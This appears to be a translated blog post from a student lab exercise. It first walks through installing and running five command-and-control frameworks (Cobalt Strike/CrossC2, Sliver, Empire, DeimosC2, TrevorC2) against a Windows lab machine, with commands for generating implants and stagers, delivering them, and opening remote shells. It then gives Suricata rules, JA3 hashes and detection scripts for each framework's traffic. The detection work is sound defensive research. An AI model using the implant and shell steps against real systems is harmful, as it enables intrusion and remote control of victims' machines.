【Work within the group】Trojan Horse Reunion

C2 server installation and operation method

CrossC2 operation method

Note: this setup only works when the C2 server and the attacker are on the same host, i.e. both are 192.168.230.137

cs server: 192.168.230.137 (kali)
attacker: 192.168.230.137 (kali)
victim: 192.168.230.143 (windows 10)

  • On cs server 192.168.230.137:

    1. Open a terminal and type:
      sudo su
      ./teamserver 192.168.230.137 123456
  • On attacker 192.168.230.137:

    1. Open another terminal and enter:
      ./cobaltstrike

    2. Set listener, https

    3. Import plugin, cna file

    4. generate payload

    5. Put the two generated payload files (one lib, one out) on the victim host

  • On victim 192.168.230.143:
    ./t_cc2.out

  • Just run wireshark on the attacker 192.168.230.137, filter condition ip.addr==192.168.230.143

How to run sliver

cs server: 192.168.230.137
attacker: 192.168.230.138
victim: 192.168.230.143

  • On the cs server 192.168.230.137:
    ./sliver-server_linux
    new-operator --name qinjian --lhost 192.168.230.137    // only run the first time
    multiplayer

  • On the attacker 192.168.230.138:
    put the file generated on the cs server 192.168.230.137 in the same directory as sliver-client_linux
    ./sliver-client_linux import qinjian_192.168.230.137.cfg    // only run the first time
    ./sliver-client_linux

  • Next, whether on the cs server or the attacker, execute the following command:
    generate --mtls 192.168.230.137 --save test.exe --os Windows    // generate the implant
    mtls    // start the mtls listener
    implants    // view the generated implants
    jobs    // view running jobs

  • Put the generated shell file test.exe on the windows victim and run it
    Double-click test.exe

  • Next, whether on the cs server or the attacker, execute the following command:
    sessions    // view sessions
    sessions -i id    // enter a session
    sessions -k id    // end a session
    shell --shell-path "C:\\windows\system32\cmd.exe"    // enter an interactive shell
    exit    // exit

  • Enable wireshark packet capture on the attacker 192.168.230.138, filter condition ip.addr==192.168.230.143

how to install empire

Note that the cs server and the attacker are the same machine here

cs server: 192.168.230.138
attacker: 192.168.230.138
victim: 192.168.230.143

  • Running on cs server 192.168.230.138:
    ./ps-empire server

  • Running on attacker 192.168.230.138:
    ./ps-empire client

  • Set the listener:
    uselistener [press Tab to choose the listener type]
    set Name [listener name]
    set Port [port number]
    execute
    listeners    // view the configured listeners
    kill [listener Name]    // delete the listener

  • Set the stager (back door):
    usestager [press Tab to choose the stager type]
    set Listener [listener Name]
    set OutFile [output file, e.g. launcher.bat]    // optional; the default is set OutFile launcher.bat
    execute

  • Put the launcher.bat in the /var/www/html directory, and let the victim 192.168.230.143 access the file

  • Run on the attacker 192.168.230.138:
    agents    // view the agent sessions obtained
    shell whoami    // execute a command

DeimosC2 installation tutorial

cs server: 192.168.230.137
attacker: 192.168.230.138
victim: 192.168.230.143

  • cs server run:
    ./DeimosC2

  • On the attacker:
    log in to https://192.168.230.137:8443
    Username: qinjian
    Password: qinjian1030
    add a listener – address set to 192.168.230.137
    download the agent for the victim's operating system; the download location can be found via the download icon in the upper right corner of the browser

  • On the victim:
    run the downloaded agents

TrevorC2 installation tutorial:

cs server: 192.168.230.137
attacker: 192.168.230.138
victim: 192.168.230.143

sudo su
conda create -n py37 python=3.7    (only needed the first time)
conda activate py37

  • Run on the cs server:
    in the SecistSploit directory:
    sudo su
    conda activate py37
    python SSF.py
    use listener/trevorc2
    show options
    set lhost [local IP]    // set the current host's IP
    set target 2    // type of agent file to generate; there are three: 1 -> C#, 2 -> powershell, 3 -> python
    run    // generate the agent file

    list    // view the victim hosts
    interact 1    // interact with the victim host

  • Run the generated agent file on the victim

Traffic characteristics of C2 server

CrossC2

1. Heartbeat packet

Suricata rules:
Initial idea (uses keywords that Suricata does not provide): alert tcp any any -> any any (msg:"Heartbeat Extension Detected"; flow:established; tls.handshake.type: 1; tls.handshake.extensions["heartbeat"]; content:"|00 0F 00 01 01|"; depth:5; sid:100001; rev:1;)

Rule actually used: alert tcp any any -> any any (msg:"Heartbeat Extension Detected"; flow:established; content:"|00 0F 00 01 01|"; sid:100001; rev:1;)

2. Command

  1. When a command is executed, the traffic differs from the usual heartbeat packet: more data is transmitted.

  2. The encrypted application data starts with 00 00 00 00 00 00 00 02.

    Suricata rule: alert tls any any -> any any (msg:"Detect HTTPS Application Data with 0000000000000002"; content:"|00 00 00 00 00 00 00 02|"; flow:established; sid:100002; rev:1;)

3. ja3/ja3s

ja3: alert tls any any -> any any (msg:"CrossC2 https ja3"; ja3.hash; content:"fd80fa9c6120cdeea8520510f3c644ac"; classtype:misc-activity; sid:1001; rev:1;)

ja3s: alert tls any any <> any any (msg:"CrossC2 https ja3s"; ja3s.hash; content:"b7bd51222a09f3ad66a340710ae9c01a"; sid:1002;)
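An added example (not code from the original post) that scopes the heartbeat check to where those bytes belong: 00 0F 00 01 01 is the TLS heartbeat extension (type 15, length 1, mode peer_allowed_to_send), so the ClientHello extension list is parsed and checked instead of matching the five bytes anywhere in an established TCP stream as the rule above does; the command check tests the 8-byte prefix at the start of an application-data record. The ClientHello records are constructed for the example.

```python
import struct

HEARTBEAT_EXT = 0x000F  # TLS extension type 15 = heartbeat (RFC 6520); data 0x01 = peer_allowed_to_send
CMD_PREFIX = bytes.fromhex("0000000000000002")  # prefix of CrossC2 command application data (from above)

def client_hello_extensions(record):
    """Walk one TLS record carrying a ClientHello and yield (ext_type, ext_data)."""
    if len(record) < 5 or record[0] != 0x16:             # content type 22 = handshake
        return
    body = record[5:5 + struct.unpack("!H", record[3:5])[0]]
    if not body or body[0] != 0x01:                      # handshake type 1 = ClientHello
        return
    p = 4 + 2 + 32                                       # hs header, version, random
    p += 1 + body[p]                                     # session id
    p += 2 + struct.unpack("!H", body[p:p + 2])[0]       # cipher suites
    p += 1 + body[p]                                     # compression methods
    if p + 2 > len(body):                                # no extensions block
        return
    end = p + 2 + struct.unpack("!H", body[p:p + 2])[0]
    p += 2
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", body[p:p + 4])
        yield etype, body[p + 4:p + 4 + elen]
        p += 4 + elen

def has_heartbeat_extension(record):
    """True when the ClientHello advertises heartbeat = peer_allowed_to_send (00 0F 00 01 01)."""
    return any(t == HEARTBEAT_EXT and d == b"\x01" for t, d in client_hello_extensions(record))

def is_cmd_record(record):
    """True for an application-data record (type 23) whose payload starts with CMD_PREFIX."""
    return len(record) > 5 and record[0] == 0x17 and record[5:13] == CMD_PREFIX

def build_client_hello(extensions):
    """Constructed minimal TLS 1.2 ClientHello record for the example (not a real capture)."""
    body = b"\x03\x03" + b"\x00" * 32 + b"\x00" + b"\x00\x02\x13\x01" + b"\x01\x00"
    body += struct.pack("!H", len(extensions)) + extensions
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs

# Constructed samples: a hello carrying the heartbeat extension, one carrying only
# supported_groups (x25519), and an application-data record with the command prefix
HELLO_WITH_HEARTBEAT = build_client_hello(b"\x00\x0f\x00\x01\x01")
HELLO_PLAIN = build_client_hello(b"\x00\x0a\x00\x04\x00\x02\x00\x1d")
CMD_RECORD = b"\x17\x03\x03" + struct.pack("!H", 12) + CMD_PREFIX + b"\xaa\xbb\xcc\xdd"
```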

Sliver

1. http

  • Unique header-specific identifier/specific request-response schema (html)

    Reading Sliver's source shows that the Sliver implant talks to the server with 5 types of messages. The request path is generated at random from a built-in list of path segments, and every path ends in one of the following extensions. The extension alone tells the server the request type; everything else in the path is ignored.

    • .woff = Stagers (not used by default)
    • .js = Long poll messages (long message polling, encrypted interaction data)
    • .html = Key exchange messages (key exchange, set-cookie)
    • .php = Session messages
    • .png = Close session messages

    Random path generation (see the Sliver source); request characteristics:

    1. Method: POST or GET
    2. The path is a combination of several strings from the list for each extension: StagerPaths, PollPaths, SessionPaths, ClosePaths
    3. The file name is one string from the list for each extension: StagerFiles, PollFiles, SessionFiles, CloseFiles
    4. File extension: .woff, .js, .html, .php, .png
    5. The query parameter name is 1 to 2 characters drawn from NonceQueryArgs: "abcdefghijklmnopqrstuvwxyz_"
    6. The nonce value is 1 to 10 characters long: digits, lowercase letters and underscores.

    In summary, the suricata rules written for these are:

    .woff:
    alert tcp any any -> any any (msg: "Sliver HTTP woff request"; flow:to_server,established;content:".woff";http_uri;pcre: "/\/(static|assets|fonts|locales)(.*?)((attribute_text_w01_regular|ZillaSlab-Regular\.subset\.bbc33fb47cf6|ZillaSlab-Bold\.subset\.e96c15f68c68|Inter-Regular|Inter-Medium)\.woff)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000001;classtype:trojan-activity; rev:1;)

    .js:
    alert tcp any any -> any any (msg: "Sliver HTTP js request"; flow:to_server,established;content:"GET";http_method;nocase;content:".js";http_uri;pcre: "/\/(js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript)(.*?)((bootstrap|bootstrap.min|jquery.min|jquery|route|app|app.min|array|backbone|script|email)\.js)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000002;classtype:trojan-activity; rev:1;)

    .html (request):
    alert tcp any any -> any any (msg: "Sliver HTTP html request&getsessionID"; flow:to_server,established;content:"POST";http_method;nocase;content:".html";http_uri;pcre: "/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.html)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000003;flowbits:set,name;flowbits:noalert;classtype:trojan-activity; rev:1;)

    .html (response):
    alert tcp any any <> any any (msg: "Sliver HTTP html response&set-cookie";flow:to_client,established;content:"Set-Cookie";http_header;pcre:"/^Set-Cookie\:\s*(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)\=[a-z0-9]{32}\;\s*HttpOnly$/i";sid:1000004;flowbits:isset,name;classtype:trojan-activity;)

    .php:
    alert tcp any any -> any any (msg: "Sliver HTTP php request"; flow:to_server,established;content:"POST";http_method;nocase;content:".php";http_uri;pcre: "/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.php)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000005;classtype:trojan-activity; rev:1;)

    .png:
    alert tcp any any -> any any (msg: "Sliver HTTP png request"; flow:to_server,established;content:".png";http_uri;pcre: "/\/(static|www|assets|images|icons|image|icon|png)(.*?)((favicon|sample|example)\.png)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000006;classtype:trojan-activity; rev:1;)

2. https

  • ja3(s) encrypted fingerprint features:

    ja3: alert tls any any -> any any (msg:"sliver https debian"; ja3.hash; content:"19e29534fd49dd27d09234e639c4057e"; classtype:misc-activity; sid:1001; rev:1;)

    ja3s: alert tls any any <> any any (msg:"sliver https"; ja3s.hash; content:"f4febc55ea12b31ae17cfb7e614afda8"; sid:1002;)
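A classifier for the Sliver request-path characteristics above, as an added example (not Sliver's or the post's code): it builds one anchored pattern per extension from the segment and file lists in the PCREs, enforces the method each rule expects, and runs over constructed request lines. The message-type labels and the sample lines are assumptions.

```python
import re

# Segments, file names and extensions per Sliver message type, copied from the PCREs
# above (Sliver's built-in *Paths and *Files lists). The nonce query arg is 1-2 chars
# from NonceQueryArgs with a 1-10 char value, as in the request characteristics.
API_SEGS = r"php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces"
API_FILES = r"login|signin|api|samples|rpc|index|admin|register|sign-up"
PROFILE = {  # ext: (message type, required method or None, segments, file names)
    ".woff": ("stager", None, r"static|assets|fonts|locales",
              r"attribute_text_w01_regular|ZillaSlab-Regular\.subset\.bbc33fb47cf6|ZillaSlab-Bold\.subset\.e96c15f68c68|Inter-Regular|Inter-Medium"),
    ".js": ("long-poll", "GET", r"js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript",
            r"bootstrap|bootstrap\.min|jquery\.min|jquery|route|app|app\.min|array|backbone|script|email"),
    ".html": ("key-exchange", "POST", API_SEGS, API_FILES),
    ".php": ("session", "POST", API_SEGS, API_FILES),
    ".png": ("close-session", None, r"static|www|assets|images|icons|image|icon|png", r"favicon|sample|example"),
}
PATTERNS = {
    ext: re.compile(r"^/(?:%s)(.*?)(?:%s)%s\?[a-z_]{1,2}=[a-z0-9_]{1,10}$"
                    % (segs, files, re.escape(ext)), re.I)
    for ext, (_, _, segs, files) in PROFILE.items()
}

def classify(method, path):
    """Return the Sliver message type a request looks like, or None."""
    for ext, pat in PATTERNS.items():
        if pat.match(path):
            want = PROFILE[ext][1]
            return PROFILE[ext][0] if want is None or method.upper() == want else None
    return None

def scan_log(log):
    """Run classify() over 'METHOD PATH' lines; return (path, type) for suspicious ones."""
    hits = []
    for line in log.splitlines():
        method, path = line.split(" ", 1)
        mtype = classify(method, path)
        if mtype:
            hits.append((path, mtype))
    return hits

# Constructed sample request lines (not a real capture); the last two are benign:
# a 7-character query-arg name and a file outside the Sliver lists do not match.
SAMPLE_LOG = """\
GET /fonts/Inter-Regular.woff?ab=12
GET /js/bundle/jquery.min.js?e=7hk2_q
POST /api/oauth2/login.html?f_=x9
POST /rest/v1/rpc.php?z=1
GET /static/images/favicon.png?q=a9
GET /static/css/main.css?v=1
GET /js/app.js?version=2
"""
```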

empire

http

https

DeimosC2

https

  • TLS version 1.2/1.3

  • https port number: the C2 server defaults to 4443 (but it can be changed)

  • ja3(s) encrypted fingerprint feature
    ja3: alert tls any any -> any any (msg:"DeimosC2 https ja3"; ja3.hash; content:"e564ee1b7bcae4467d8c759df910ed9c"; classtype:misc-activity; sid:1001; rev:1;)
    ja3s: alert tls any any <> any any (msg:"DeimosC2 https ja3s"; ja3s.hash; content:"f4febc55ea12b31ae17cfb7e614afda8"; sid:1002;)    (the ja3s hash is the same as Sliver's)
    Note: these reuse sid 1001/1002 from the CrossC2 and Sliver ja3 rules; Suricata rejects duplicate signature ids, so renumber them before loading the rules together.

TrevorC2

  • Heartbeat packet: http (the server's reply to the heartbeat carries a large payload; in the capture, Reassembled TCP length: 386861)

  • Each HTTP request from the victim host uses a new source port, and the port number increases by 1 each time
    Suricata rule: alert tcp any any -> any any (msg:"HTTP Request Source Port Sequential Increase"; flow:established,to_server; content:"GET"; http_method; pcre:"/^Host:[^\r\n]+\r\n/"; lua:check_port.lua; sid:100001; rev:1;)
    check_port.lua (using Suricata's Lua detection API: init() declares what the script needs, match() returns 1 or 0):

    function init(args)
        -- ask Suricata for packet access so SCPacketTuple() is available in match()
        local needs = {}
        needs["packet"] = tostring(true)
        return needs
    end

    -- The Lua API has no "previous packet" handle, so the last source port seen
    -- from each client IP is kept in a table that lives as long as the detect
    -- thread's Lua state (with several detect threads, a client's requests may
    -- be spread over several states and some increments go unseen).
    local last_src_port = {}

    function match(args)
        local ipver, srcip, dstip, proto, sp, dp = SCPacketTuple()
        local prev = last_src_port[srcip]
        last_src_port[srcip] = sp
        -- match when this request's source port is exactly the previous one + 1;
        -- the rule's http_method/pcre keywords already restrict this to HTTP requests
        if prev ~= nil and sp == prev + 1 then
            return 1
        end
        return 0
    end

    
  • When commands are sent interactively, the victim host requests a URL of the form /images?guid=xxxx, where xxxx looks like base64 and is padded with = at the end (sometimes it decodes as base64, sometimes not, and the decoded bytes again look base64-like)
    Suricata rule: alert tcp any any -> any any (msg:"TrevorC2 interact"; flow:to_server,established; content:"/images?guid="; http_uri; pcre:"/\/images\?guid=[A-Za-z0-9+\/=]+/i"; sid:1000002; classtype:trojan-activity; rev:1;)
    Note: the TrevorC2 rules reuse sid 100001 (CrossC2 heartbeat) and sid 1000002 (Sliver .js request); Suricata rejects duplicate signature ids, so renumber them before loading the rules together.
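The two TrevorC2 signals above (climbing source ports and the /images?guid= beacon) as an added example run over constructed request records, not code from the original post. It generalizes the port check to a run of at least 3 consecutive +1 increments per client/server pair, so a single accidental +1 between unrelated connections does not fire; the record layout and the threshold are assumptions.

```python
import re

# /images?guid=<base64-like>: base64 alphabet, optional '=' padding, length a multiple of 4.
# The value does not always decode (as noted above), so only the shape is checked.
GUID_RE = re.compile(r"^/images\?guid=([A-Za-z0-9+/]+={0,2})$")

def looks_like_guid_beacon(uri):
    m = GUID_RE.match(uri)
    return bool(m) and len(m.group(1)) % 4 == 0

def sequential_port_alerts(records, min_run=3):
    """Flag a client whose consecutive HTTP requests to one server use source ports
    that each increase by exactly 1 for at least min_run requests in a row."""
    last = {}      # (client, server) -> (last source port, current run length)
    alerts = []
    for src, sport, dst, uri in records:
        key = (src, dst)
        prev_port, run = last.get(key, (None, 0))
        run = run + 1 if prev_port is not None and sport == prev_port + 1 else 1
        last[key] = (sport, run)
        if run == min_run:   # fire once, when the run first reaches the threshold
            alerts.append((src, dst, sport))
    return alerts

def guid_alerts(records):
    return [(src, uri) for src, _, _, uri in records if looks_like_guid_beacon(uri)]

# Constructed sample (not a real capture): the victim 192.168.230.143 beaconing to the
# TrevorC2 server 192.168.230.137 with climbing source ports, plus an unrelated client
# whose ephemeral ports are not sequential.
SAMPLE = [
    ("192.168.230.143", 49730, "192.168.230.137", "/"),
    ("192.168.230.143", 49731, "192.168.230.137", "/"),
    ("10.0.0.5", 51002, "192.168.230.137", "/index.html"),
    ("192.168.230.143", 49732, "192.168.230.137", "/images?guid=aGVsbG8gd29ybGQ="),
    ("10.0.0.5", 51377, "192.168.230.137", "/style.css"),
    ("192.168.230.143", 49733, "192.168.230.137", "/"),
]
```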


Origin blog.csdn.net/Dajian1040556534/article/details/131300734